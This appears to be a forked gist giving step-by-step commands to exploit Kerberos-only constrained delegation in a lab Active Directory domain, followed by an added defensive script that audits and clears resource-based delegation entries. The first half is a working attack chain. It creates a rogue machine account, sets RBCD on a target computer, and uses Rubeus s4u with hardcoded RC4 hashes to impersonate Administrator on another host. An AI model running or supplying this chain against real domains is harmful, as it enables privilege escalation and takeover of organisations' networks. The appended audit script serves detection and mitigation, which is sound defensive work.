@analyticsearch
Forked from notsoshant/kerberos_only.ps1
Created October 11, 2022 15:29
Commands to exploit Kerberos Only Constrained Delegation
# Add Machine account
New-MachineAccount -MachineAccount STRANGE -Password $(ConvertTo-SecureString 'Strange@123' -AsPlainText -Force)
# Add STRANGE$ in msDS-AllowedToActOnBehalfOfOtherIdentity attribute of QUARK$
$S4UIdentity = "COSMOS\STRANGE$"
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer "QUARK.COSMOS.LAB" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
# Verify if RBCD is set correctly
$RawBytes = Get-DomainComputer "QUARK.COSMOS.LAB" -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier
# RBCD to get forwardable TGS from S4U2Proxy
.\Rubeus.exe s4u /impersonateuser:Administrator /user:STRANGE$ /rc4:0ED0E7DA0EFAD91BE14AB2D1404A8226 /msdsspn:http/QUARK.COSMOS.LAB /nowrap
.\Rubeus.exe describe /ticket:[ticket]
# Use the TGS as 'S4U2Self' for BOSON$
Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
.\Rubeus.exe s4u /tgs:[ticket] /user:QUARK$ /rc4:39788bc50412dfad55fbaa1b24af57b7 /msdsspn:cifs/BOSON.COSMOS.LAB /altservice:http /ptt
Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
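The gist's "verify" step decodes the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor for one host. The audit script below, added here and not part of the gist or of Rubeus/PowerView, applies the same decoding domain-wide from the defender's side: it lists every computer whose RBCD attribute is populated, resolves each trustee, and can clear the attribute. The LDAP search base and the -Remove switch are assumptions for illustration; it needs no AD module, only a domain-joined host.

```powershell
# Added RBCD audit (example, not from the gist). Enumerates computers with a
# populated msDS-AllowedToActOnBehalfOfOtherIdentity, decodes the stored
# security descriptor exactly as the gist's verify step does, and reports
# every trustee. Search base is an assumed value; adjust to your domain.
param(
    [string]$SearchBase = "LDAP://DC=cosmos,DC=lab",   # assumed domain
    [switch]$Remove                                    # clear the attribute instead of only reporting
)

$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]$SearchBase
# Match any computer object where the RBCD attribute has a value at all
$searcher.Filter = "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
$searcher.PageSize = 500
[void]$searcher.PropertiesToLoad.AddRange(@("sAMAccountName", "msDS-AllowedToActOnBehalfOfOtherIdentity"))

foreach ($result in $searcher.FindAll()) {
    $name  = $result.Properties["samaccountname"][0]
    $bytes = [byte[]]$result.Properties["msds-allowedtoactonbehalfofotheridentity"][0]
    # Same decoding as the gist: raw bytes -> RawSecurityDescriptor -> DACL
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0

    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = "<unresolved SID: deleted or foreign principal>" }
        # An unresolvable trustee is itself a finding: a throwaway machine
        # account (like STRANGE$ above) that was created, used and deleted
        # leaves exactly this residue in the DACL.
        [pscustomobject]@{
            Computer   = $name
            AceType    = $ace.AceType
            Trustee    = $who
            SID        = $sid.Value
            AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
        }
    }

    if ($Remove) {
        # Mitigation: clearing the attribute removes every RBCD trustee for this host
        $entry = $result.GetDirectoryEntry()
        $entry.Properties["msDS-AllowedToActOnBehalfOfOtherIdentity"].Clear()
        $entry.CommitChanges()
        Write-Warning "Cleared RBCD trustees on $name"
    }
}
```

Review the report before using -Remove: legitimate RBCD entries (for example a front-end web server allowed to delegate to its back-end) look identical to the one the gist plants, so the trustee name and whether it was expected are what distinguish them.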